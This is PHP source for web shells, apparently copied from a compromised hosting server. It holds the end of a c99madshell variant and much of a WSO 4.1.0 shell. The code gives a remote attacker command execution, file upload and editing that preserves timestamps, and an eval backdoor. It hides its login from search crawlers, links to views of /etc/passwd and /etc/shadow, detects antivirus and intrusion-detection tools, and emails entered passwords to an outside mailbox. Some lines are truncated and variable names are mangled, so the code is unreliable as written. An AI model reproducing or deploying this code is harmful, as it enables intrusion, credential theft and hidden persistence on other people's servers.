  }
  elseif ($ft == "notepad")
  {
   @ob_clean();
   header("Content-type: text/plain");
   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
   echo($r);
   exit;
  }
  elseif ($ft == "edit")
  {
   if (!empty($submit))
   {
    if ($filestealth) {$stat = stat($d.$f);}
    $fp = fopen($d.$f,"w");
    if (!$fp) {echo "<b>Can't write to file!</b>";}
    else
    {
     echo "<b>Saved!</b>";
     fwrite($fp,$edit_text);
     fclose($fp);
     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
     $r = $edit_text;
    }
   }
   $rows = count(explode("\r\n",$r));
   if ($rows < 10) {$rows = 10;}
   if ($rows > 30) {$rows = 30;}
   echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  }
  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
 }
}
if ($act == "about") {echo "<center><b>Webbased shell for administration your resources<br>Credits:<br>Start coding by CCTeaM.<br><font color=green>Edited and Finished by <b>MADNET</b><br>ICQ 751777 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=751777\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=751777&img=5\" border=0 align=absmiddle></font></a>.</b>";}
?>
 
</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="#" onclick="document.todo.act.value='cmd';document.todo.d.value='<?php echo urlencode($d); ?>';document.todo.submit();"><b>Command execute</b></a> ::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
<br>
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr>
 <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='search';document.todo.submit();"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
 
 <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='upload';document.todo.submit();"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
</tr>
</table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a>| <a href="http://securityprobe.net"><font color="#FF0000">http://securityprobe.net</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
 
</body></html><?php chdir($lastdir); c99shexit(); ?>

/home/www/confixx/html/reseller/index3.php

<?php
//-----------------Password---------------------
$â297a57a5a743894a0e4a801fc3"; //admin
$â = "#fff";
$â = true;
$â = 'UTF-8';
$â = 'FilesMan';
$â = md5($_SERVER['HTTP_USER_AGENT']);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
 prototype(md5($_SERVER['HTTP_HOST'])."key", $â);
}
if(empty($_POST['charset']))
 $_POST['charset'] = $â;
if (!isset($_POST['ne'])) {
 if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
 if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '4.1.0');
if(get_magic_quotes_gpc()) {
 function stripslashes_array($array) {
  return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
 }
 $_POST = stripslashes_array($_POST);
    $_COOKIE = stripslashes_array($_COOKIE);
}
if(!empty($â
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $â
rototype(md5($_SERVER['HTTP_HOST']), $â
f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â
ardLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
 $os = 'win';
else
 $os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
 @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
 $home_cwd = str_replace("\\", "/", $home_cwd);
 $cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
 $cwd .= '/';
function hardHeader() {
 if(empty($_POST['charset']))
  $_POST['charset'] = $GLOBALS['â'];
 global $â;
 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
<style>
 body {background-color:#060a10;color:#e1e1e1;}
 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
 table.info {color:#C3C3C3;background-color:#060a10;}
 span,h1,a {color:$â !important;}
 span  {font-weight:bolder;}
 h1   {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
 div.content {padding:5px;margin-left:5px;background-color:#060a10;}
 a   {text-decoration:none;}
 a:hover   {text-decoration:underline;}
 .ml1  {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;}
 .bigarea {width:100%;height:250px; }
 input, textarea, select  {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;}
 form  {margin:0px;}
 #toolsTbl {text-align:center;}
 .toolsInp {width:300px}
 .main th {text-align:left;background-color:#060a10;}
 .main tr:hover{background-color:#354252;}
 .main td, th{vertical-align:middle;}
 .l1   {background-color:#1e252e;}
 pre   {font:9pt Courier New;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
 
 function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
 function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
 function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
 function set(a,c,p1,p2,p3,charset) {
  if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
  if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
  if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
  if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
  if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
  d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
  if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 }
 function g(a,c,p1,p2,p3,charset) {
  set(a,c,p1,p2,p3,charset);
  d.mf.submit();
 }
 function a(a,c,p1,p2,p3,charset) {
  set(a,c,p1,p2,p3,charset);
  var params = 'ajax=true';
  for(i=0;i<d.mf.elements.length;i++)
   params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
  sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
 }
 function sr(url, params) {
  if (window.XMLHttpRequest)
   req = new XMLHttpRequest();
  else if (window.ActiveXObject)
   req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
 }
 function processReqChange() {
  if( (req.readyState == 4) )
   if(req.status == 200) {
    var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
    var arr=reg.exec(req.responseText);
    eval(arr[2].substr(0, arr[1]));
   } else alert('Request error!');
 }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
 $freeSpace = @diskfreespace($GLOBALS['cwd']);
 $totalSpace = @disk_total_space($GLOBALS['cwd']);
 $totalSpace = $totalSpace?$totalSpace:1;
 $release = @php_uname('r');
 $kernel = @php_uname('s');
 $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
 if(strpos('Linux', $kernel) !== false)
  $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
 else
  $explink .= urlencode($kernel . ' ' . substr($release,0,3));
 if(!function_exists('posix_getegid')) {
  $user = @get_current_user();
  $uid = @getmyuid();
  $gid = @getmygid();
  $group = "?";
 } else {
  $uid = @posix_getpwuid(@posix_geteuid());
  $gid = @posix_getgrgid(@posix_getegid());
  $user = $uid['name'];
  $uid = $uid['uid'];
  $group = $gid['name'];
  $gid = $gid['gid'];
 }
 $cwd_links = '';
 $path = explode("/", $GLOBALS['cwd']);
 $n=count($path);
 for($i=0; $i<$n-1; $i++) {
  $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
  for($j=0; $j<=$i; $j++)
   $cwd_links .= $path[$j].'/';
  $cwd_links .= "\")'>".$path[$i]."/</a>";
 }
 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
 $opt_charsets = '';
 foreach($charsets as $â)
  $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>';
 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
 if(!empty($GLOBALS['â))
 $m['Logout'] = 'Logout';
 $m['Self remove'] = 'SelfRemove';
 $menu = '';
 foreach($m as $k => $v)
  $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
 $drives = "";
 if ($GLOBALS['os'] == 'win') {
  foreach(range('c','z') as $drive)
  if (is_dir($drive.':\\'))
   $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 }
 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'.
   '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'.
   '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'.
   '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>';
}
function hardFooter() {
 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
 <tr>
  <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
  <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
 </tr><tr>
  <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
  <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
 </tr><tr>
  <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
  <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
  <input type=hidden name=a value='FilesMan'>
  <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
  <input type=hidden name=p1 value='uploadFile'>
  <input type=hidden name=ne value=''>
  <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
  <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='>>'></form><br  ></td>
 </tr></table></div></body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
 $â = '';
 if (function_exists('exec')) {
  @exec($in,$â);
  $â = @join("\n",$â);
 } elseif (function_exists('passthru')) {
  ob_start();
  @passthru($in);
  $â = ob_get_clean();
 } elseif (function_exists('system')) {
  ob_start();
  @system($in);
  $â = ob_get_clean();
 } elseif (function_exists('shell_exec')) {
  $â = shell_exec($in);
 } elseif (is_resource($f = @popen($in,"r"))) {
  $â = "";
  while(!@feof($f))
   $â .= fread($f,1024);
  pclose($f);
 }else return "â³ Unable to execute command\n";
 return ($â==''?"â³ Query did not return anything\n":$â);
}
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â;
 
if(array_key_exists('pff',$_POST)){
  $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp);
}
function hardLogin() {
  if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
  }
 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>");
}
function viewSize($s) {
 if($s >= 1073741824)
  return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 elseif($s >= 1048576)
  return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 elseif($s >= 1024)
  return sprintf('%1.2f', $s / 1024 ) . ' KB';
 else
  return $s . ' B';
}
function perms($p) {
 if (($p & 0xC000) == 0xC000)$i = 's';
 elseif (($p & 0xA000) == 0xA000)$i = 'l';
 elseif (($p & 0x8000) == 0x8000)$i = '-';
 elseif (($p & 0x6000) == 0x6000)$i = 'b';
 elseif (($p & 0x4000) == 0x4000)$i = 'd';
 elseif (($p & 0x2000) == 0x2000)$i = 'c';
 elseif (($p & 0x1000) == 0x1000)$i = 'p';
 else $i = 'u';
 $i .= (($p & 0x0100) ? 'r' : '-');
 $i .= (($p & 0x0080) ? 'w' : '-');
 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 $i .= (($p & 0x0020) ? 'r' : '-');
 $i .= (($p & 0x0010) ? 'w' : '-');
 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 $i .= (($p & 0x0004) ? 'r' : '-');
 $i .= (($p & 0x0002) ? 'w' : '-');
 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 return $i;
}
function viewPermsColor($f) {
 if (!@is_readable($f))
  return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
 elseif (!@is_writable($f))
  return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
 else
  return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
}
function hardScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
function which($p) {
 $path = ex('which ' . $p);
 if(!empty($path))
  return $path;
 return false;
}
function actionRC() {
 if(!@$_POST['p1']) {
  $a = array(
   "uname" => php_uname(),
   "php_version" => phpversion(),
   "VERSION" => VERSION,
   "safemode" => @ini_get('safe_mode')
  );
  echo serialize($a);
 } else {
  eval($_POST['p1']);
 }
}
function prototype($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function actionSecInfo() {
 hardHeader();
 echo '<h1>Server security information</h1><div class=content>';
 function showSecParam($n, $v) {
  $v = trim($v);
  if($v) {
   echo '<span>' . $n . ': </span>';
   if(strpos($v, "\n") === false)
    echo $v . '<br>';
   else
    echo '<pre class=ml1>' . $v . '</pre>';
  }
 }
 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
 showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
 showSecParam('Open base dir', @ini_get('open_basedir'));
 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
 $temp=array();
 if(function_exists('mysql_get_client_info'))
  $temp[] = "MySql (".mysql_get_client_info().")";
 if(function_exists('mssql_connect'))
  $temp[] = "MSSQL";
 if(function_exists('pg_connect'))
  $temp[] = "PostgreSQL";
 if(function_exists('oci_connect'))
  $temp[] = "Oracle";
 showSecParam('Supported databases', implode(', ', $temp));
 echo '<br>';
 if($GLOBALS['os'] == 'nix') {
            showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            showSecParam('OS version', @file_get_contents('/proc/version'));
            showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                showSecParam('HDD space', ex('df -h'));
                showSecParam('Hosts', @file_get_contents('/etc/hosts'));
    showSecParam('Mount options', @file_get_contents('/etc/fstab'));
            }
 } else {
  showSecParam('OS Version',ex('ver'));
  showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
  showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
 }
 echo '</div>';
 hardFooter();
}
function actionFilesTools() {
 if( isset($_POST['p1']) )
  $_POST['p1'] = urldecode($_POST['p1']);
 if(@$_POST['p2']=='download') {
  if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
   ob_start("ob_gzhandler", 4096);
   header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
   if (function_exists("mime_content_type")) {
    $type = @mime_content_type($_POST['p1']);
    header("Content-Type: " . $type);
   } else
                header("Content-Type: application/octet-stream");
   $fp = @fopen($_POST['p1'], "r");
   if($fp) {
    while(!@feof($fp))
     echo @fread($fp, 1024);
    fclose($fp);
   }
  }exit;
 }
 if( @$_POST['p2'] == 'mkfile' ) {
  if(!file_exists($_POST['p1'])) {
   $fp = @fopen($_POST['p1'], 'w');
   if($fp) {
    $_POST['p2'] = "edit";
    fclose($fp);
   }
  }
 }
 hardHeader();
 echo '<h1>File tools</h1><div class=content>';
 if( !file_exists(@$_POST['p1']) ) {
  echo 'File not exists';
  hardFooter();
  return;
 }
 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 if(!$uid) {
  $uid['name'] = @fileowner($_POST['p1']);
  $gid['name'] = @filegroup($_POST['p1']);
 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
